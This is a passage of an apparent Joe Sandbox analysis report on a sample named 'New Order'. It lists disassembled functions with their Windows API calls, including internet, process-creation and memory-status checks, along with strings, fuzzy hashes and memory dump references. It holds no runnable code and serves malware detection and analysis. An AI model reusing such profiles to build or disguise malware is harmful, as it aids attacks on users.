Opcode Fuzzy Hash: 26305214e91768ae3631a680d066ec101393c1e5f23d3a7c14cd6eabed2a5048
Instruction Fuzzy Hash: 91915C75A002049FCB15DF58C4C4EAABBF5AF48304F198099E84A9F7A2D735EE85CF91

Function 002EE27D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 002EE30D

Strings

pow, xrefs: 002EE2E5, 002EE302

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 8741427a82231bc309fc9b9bab8cd5c810d24702f330dd67506fc739f13a2921
Instruction ID: 0303948c1875f55abdae2038098b535ecf837fe585590973bbdf658e6c4da247
Opcode Fuzzy Hash: 8741427a82231bc309fc9b9bab8cd5c810d24702f330dd67506fc739f13a2921
Instruction Fuzzy Hash: 2251906197C14B96CF127F15CD0137ABB98EB40780FB189B9E1D6422E9DB714CB19E42

Function 00347771 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(0031569E,00000000,?,0035CC08,?,00000000,00000000), ref: 003478DD

Part of subcall function 002C6B57: _wcslen.LIBCMT ref: 002C6B6A

CharUpperBuffW.USER32(0031569E,00000000,?,0035CC08,00000000,?,00000000,00000000), ref: 0034783B

Strings

<s8, xrefs: 003477C8

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: BuffCharUpper$_wcslen
String ID: <s8
API String ID: 3544283678-4263532365
Opcode ID: 83b5a9f220235546b83810ff46b7eeff5fc37a05151493b30597f06d04461e04
Instruction ID: 7c966a9b16139bc6cfe72053a6aff0ab2a06b53b4814814dbfb8bb5f61b6642d
Opcode Fuzzy Hash: 83b5a9f220235546b83810ff46b7eeff5fc37a05151493b30597f06d04461e04
Instruction Fuzzy Hash: D7616F36924218AACF06FBA4CC91EFDB3B8BF14304B544629E542B7091EF306A55CFA0

Function 002DE187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

#, xrefs: 002DE1B1

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 23c03535092cb5e1b6e93faf60d188a350283e6517d7d86bfc3dd88d71246bae
Instruction ID: 8a5f01687fbecceae36840fd526d930dac4e6a7c9bab60444d96a6c4f194a427
Opcode Fuzzy Hash: 23c03535092cb5e1b6e93faf60d188a350283e6517d7d86bfc3dd88d71246bae
Instruction Fuzzy Hash: 45512635900346DFEF1AEF68C485AFA7BA8EF29310F25405AEC519B2D0D7319D92CB90

Function 002DF291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 002DF2A2
GlobalMemoryStatusEx.KERNEL32(?), ref: 002DF2BB

Strings

@, xrefs: 002DF2AF

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 9d0dd8dc5090db97cce9c6fc0e23696b7e6cc1ce3b6af0459fbc314833565681
Instruction ID: f2777accd53e9df49084140b40c60ac7433a20b9a4ef892d80f46791e749a26e
Opcode Fuzzy Hash: 9d0dd8dc5090db97cce9c6fc0e23696b7e6cc1ce3b6af0459fbc314833565681
Instruction Fuzzy Hash: AA5134724287449BD320AF14DC86BABBBFCFB84304F81895DF1D9411A5EB708979CB66

Function 00345745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 003457E0
_wcslen.LIBCMT ref: 003457EC

Strings

CALLARGARRAY, xrefs: 003457E6, 003457EB

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: BuffCharUpper_wcslen
String ID: CALLARGARRAY
API String ID: 157775604-1150593374
Opcode ID: 39c27bac764f8999df4f31344dbcba5e404d830774eeb50e573b5d456afb9dc7
Instruction ID: fb2837700a0fc9b18e977ac707272dc97629d50f43c128a2df2067cde6f3d2bb
Opcode Fuzzy Hash: 39c27bac764f8999df4f31344dbcba5e404d830774eeb50e573b5d456afb9dc7
Instruction Fuzzy Hash: 7341A231E102199FCB05EFA9C881DAEBBF5FF59314F114169E405AB252EB30AD81CF90

Function 0033D0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0033D130
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0033D13A

Strings

|, xrefs: 0033D10B

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: CrackInternet_wcslen
String ID: |
API String ID: 596671847-2343686810
Opcode ID: 4125aeeac889a72da8963a1bf1f239d6181a89fcaada6c20bcb453276d341f0a
Instruction ID: d9ffa5b1a16742ff7e7c578063ba8d2f7fc4b4622e9486c7e88490896dfe51a3
Opcode Fuzzy Hash: 4125aeeac889a72da8963a1bf1f239d6181a89fcaada6c20bcb453276d341f0a
Instruction Fuzzy Hash: AE311871D10209ABCF15EFA5DC85EEEBFB9FF04300F000119E815A6162E731AA56CF60

Function 0035356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00353621
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0035365C

Strings

static, xrefs: 003535BC

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: a921fe1b51954421af4d58102de19f332ea7accd01dfedcc21b21f7bdd9abfff
Instruction ID: 456903c2bf7f0dda46140556abc2bf5ed6ba1660c8f8ce91ddbcaa19da3b2e55
Opcode Fuzzy Hash: a921fe1b51954421af4d58102de19f332ea7accd01dfedcc21b21f7bdd9abfff
Instruction Fuzzy Hash: E131BC71110204AEDB119F28CC80FFB73A9FF88765F11961DFCA5972A0DA30AD96CB60

Function 00354537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 0035461F
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00354634

Strings

', xrefs: 0035458E

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 22f907ef8b152f8cda56366cd58efe315e59715dd88e5b51d6ec9aeaf68705f9
Instruction ID: d49b896b25990842fece7f64982a869db2c8bccf06fa4454086b0a36089f4553
Opcode Fuzzy Hash: 22f907ef8b152f8cda56366cd58efe315e59715dd88e5b51d6ec9aeaf68705f9
Instruction Fuzzy Hash: D6313774A0030A9FDB19CF69C980FDABBB9FB09305F10446AED04AB351E730A985CF90

Function 003531EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0035327C
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00353287

Strings

Combobox, xrefs: 00353249

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 57a8fcdaf3477459775e90aab0305bd02a27fa84e767faaad3e57d3f4d5ca4a9
Instruction ID: 4ccfb6278681b17c833ec7334bf33c267c3510e233bd6214585eb93fae5bfcbc
Opcode Fuzzy Hash: 57a8fcdaf3477459775e90aab0305bd02a27fa84e767faaad3e57d3f4d5ca4a9
Instruction Fuzzy Hash: D011E2713046087FEF229F54DC80EBB776EEB943A5F114528F918A72A0D631DD5587A0

Function 00353710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 002C600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 002C604C
Part of subcall function 002C600E: GetStockObject.GDI32(00000011), ref: 002C6060
Part of subcall function 002C600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 002C606A

GetWindowRect.USER32(00000000,?), ref: 0035377A
GetSysColor.USER32(00000012), ref: 00353794

Strings

static, xrefs: 00353757

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 73568ae74ac3a15894f55b6b0980f01b20b3957d06b00b3144288df47ad14b93
Instruction ID: 6e5fcf7063b4b04c4461ece47c13e6080af4cb596abef58e68a48aa39023e09d
Opcode Fuzzy Hash: 73568ae74ac3a15894f55b6b0980f01b20b3957d06b00b3144288df47ad14b93
Instruction Fuzzy Hash: 06116AB2A1020AAFDF02DFA8CC45EEA7BB8FB08345F014914FD55E2260E735E955DB50

Function 0033CD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0033CD7D
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0033CDA6

Strings

<local>, xrefs: 0033CD66

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: eccd08de5334ce70798403fba95abfd906719545e18fbcb6961844cb2d227242
Instruction ID: 170a53b62e6a02f4991fcd4492df5c10a2a1dd51c69f7f21c1976dd4b12c621a
Opcode Fuzzy Hash: eccd08de5334ce70798403fba95abfd906719545e18fbcb6961844cb2d227242
Instruction Fuzzy Hash: B411C275225731BED73A4B668C89EE7BEACEF127A4F00522AB109A3490D7709840D7F0

Function 00353429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 003534AB
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 003534BA

Strings

edit, xrefs: 0035348F

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 505191ed9d8a5dc77f0d93ab74609a79e682768bc2b6a93faaecd2b225cb14f7
Instruction ID: ef6eb19581f0ea91d02354ee88362e88030487ff489cc7dd9acef3da3e75fc3f
Opcode Fuzzy Hash: 505191ed9d8a5dc77f0d93ab74609a79e682768bc2b6a93faaecd2b225cb14f7
Instruction Fuzzy Hash: 88118BB1100208AFEB134E659C44EBB376AEB053B9F514724FD61931E0C731DD999B50

Function 00326C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 002C9CB3: _wcslen.LIBCMT ref: 002C9CBD

CharUpperBuffW.USER32(?,?,?), ref: 00326CB6
_wcslen.LIBCMT ref: 00326CC2

Strings

STOP, xrefs: 00326CBC, 00326CC1

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: STOP
API String ID: 1256254125-2411985666
Opcode ID: 8608bc9a5b7afe96f9af0fc4ccb4f3511680dd7cd8a3fdcc3ac5e44e130df957
Instruction ID: 21770a641c2034bd018ae738ce99fdd6664f4c1fb39307d4fe4556cc67384f3a
Opcode Fuzzy Hash: 8608bc9a5b7afe96f9af0fc4ccb4f3511680dd7cd8a3fdcc3ac5e44e130df957
Instruction Fuzzy Hash: 15012B3261053A8BCB22AFFDEC429BF33B8FF607147410539E45293195EB31D950C650

Function 00321CDE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 002C9CB3: _wcslen.LIBCMT ref: 002C9CBD

Part of subcall function 00323CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00323CCA

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00321D4C

Strings

ListBox, xrefs: 00321D16
ComboBox, xrefs: 00321CEB

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 6226121c2c929bac09f5f434b39377eb5dbeed3e562f2f1fd3988ea3f7bbc416
Instruction ID: 131fa054144ea40ba36f71437ce7b9320888218636892c9b68f08864935af41d
Opcode Fuzzy Hash: 6226121c2c929bac09f5f434b39377eb5dbeed3e562f2f1fd3988ea3f7bbc416
Instruction Fuzzy Hash: 2F01D875611234ABCB06FFA4ED55DFE7768EF66350B04061AF832572D1EA3059188B60

Function 00321BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 002C9CB3: _wcslen.LIBCMT ref: 002C9CBD

Part of subcall function 00323CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00323CCA

SendMessageW.USER32(?,00000180,00000000,?), ref: 00321C46

Strings

ListBox, xrefs: 00321C10
ComboBox, xrefs: 00321BE5

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 707c1b699c109f8f661d914e842469399cdd31ad944a10284bf9f880df203e90
Instruction ID: 483ccce709942387ac529399d0210e2e8ae4fd30ddaad918369530a0b6e2f28e
Opcode Fuzzy Hash: 707c1b699c109f8f661d914e842469399cdd31ad944a10284bf9f880df203e90
Instruction Fuzzy Hash: EC01F7756802286ACB06FBA0DA55EFF77AC9F25340F140119E41677281EA209F1887B1

Function 00321C5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 002C9CB3: _wcslen.LIBCMT ref: 002C9CBD

Part of subcall function 00323CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00323CCA

SendMessageW.USER32(?,00000182,?,00000000), ref: 00321CC8

Strings

ListBox, xrefs: 00321C94
ComboBox, xrefs: 00321C69

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 21981fdd9b41c04d68668a08681dee0502674290dc95ec62ce6833018ac15863
Instruction ID: e5d11b11ae03d205627f0bc4350ca44357770db62212ddea702cad34c3768d0e
Opcode Fuzzy Hash: 21981fdd9b41c04d68668a08681dee0502674290dc95ec62ce6833018ac15863
Instruction Fuzzy Hash: 0301D67568023867CB06FBA0DB15EFE77AC9F21340F140129B80277281EA209F18C6B1

Function 002DA4D6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 002DA529

Part of subcall function 002C9CB3: _wcslen.LIBCMT ref: 002C9CBD

Strings

,%9, xrefs: 002DA509
3y1, xrefs: 002DA545, 002DA54D, 002DA552

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Init_thread_footer_wcslen
String ID: ,%9$3y1
API String ID: 2551934079-3363791809
Opcode ID: 500de4629994c8c58355e9508c4617790428124c59fdc4b9187dc856c9bf8d44
Instruction ID: 6a120ca9e2d6e605fb607a884194e71591fbc656da0e2156011b078d25270a9d
Opcode Fuzzy Hash: 500de4629994c8c58355e9508c4617790428124c59fdc4b9187dc856c9bf8d44
Instruction Fuzzy Hash: BB014E31B606105BC905F769EC5BF9D7354DB06710FD0011AF5111B3C2DE509D628E9B

Function 00358172 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00393018,0039305C), ref: 003581BF
CloseHandle.KERNEL32 ref: 003581D1

Strings

\09, xrefs: 0035818A

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: \09
API String ID: 3712363035-447000637
Opcode ID: 4b169f04cbed8847eeaf3a0ec402c2103442b42aee93a7658c72eda4598545d9
Instruction ID: 4906827e95abbce9b75463f7c11f0a56662bcabd869415c586c53de843c1bbbf
Opcode Fuzzy Hash: 4b169f04cbed8847eeaf3a0ec402c2103442b42aee93a7658c72eda4598545d9
Instruction Fuzzy Hash: E2F082F5650304BEE7226762AC4AFB73A5CDB04755F000461BB0AD52A2D67A8E1487F8

Function 0034747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00347493
_wcslen.LIBCMT ref: 003474B9

Strings

3, 3, 16, 1, xrefs: 00347483

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

